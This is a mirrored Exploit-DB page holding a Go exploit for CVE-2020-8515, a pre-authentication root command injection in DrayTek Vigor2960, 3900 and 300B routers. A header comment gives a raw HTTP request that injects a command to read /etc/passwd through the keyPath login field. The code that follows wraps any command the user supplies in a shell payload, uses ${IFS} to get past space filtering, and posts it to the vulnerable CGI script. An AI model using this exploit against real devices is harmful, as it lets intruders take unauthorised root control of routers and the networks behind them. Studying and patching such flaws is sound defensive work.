Multiple DrayTek Products – Pre-authentication Remote Root Code Execution - 体验盒子

作者： 0xsha

日期： 2020-03-30

类别：

remote

平台：

linux

来源：https://www.exploit-db.com/exploits/48268/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

package main

/*

CVE-2020-8515: DrayTek pre-auth remote root RCE

Mon Mar 30 2020 -0xsha.io

Affected:

DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,

and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,

and 1.4.4_Beta

You should upgrade as soon as possible to 1.5.1 firmware or later

This issue has been fixed in Vigor3900/2960/300B v1.5.1.

read more :

https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html

https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/

https://thehackernews.com/2020/03/draytek-network-hacking.html

https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/

exploiting using keyPath

POST /cgi-bin/mainfunction.cgi HTTP/1.1

Host: 1.2.3.4

Content-Length: 89

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a

*/

import (

"fmt"

"io/ioutil"

"net/http"

"net/url"

"os"

"strings"

)

func usage(){

fmt.Println("CVE-2020-8515 exploit by@0xsha ")

fmt.Println("Usage :" + os.Args[0] + " URL " + "command")

fmt.Println("E.G :" + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"")

}

func main() {

if len(os.Args) < 3 {

usage()

os.Exit(-1)

}

targetUrl := os.Args[1]

//cmd := "cat /etc/passwd"

cmd := os.Args[2]

// payload preparation

vulnerableFile := "/cgi-bin/mainfunction.cgi"

// specially crafted CMD

// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a

payload :=<code>'

/bin/sh -c 'CMD'

'

payload = strings.ReplaceAll(payload,"CMD", cmd)

bypass := strings.ReplaceAll(payload," ", "${IFS}")

//PostForm call url encoder internally

resp, err := http.PostForm(targetUrl+vulnerableFile ,

url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} })

if err != nil{

fmt.Println("error connecting host")

os.Exit(-1)

}

defer resp.Body.Close()

body, err := ioutil.ReadAll(resp.Body)

if err != nil{

fmt.Println("error reading data")

os.Exit(-1)

}

fmt.Println(string(body))

}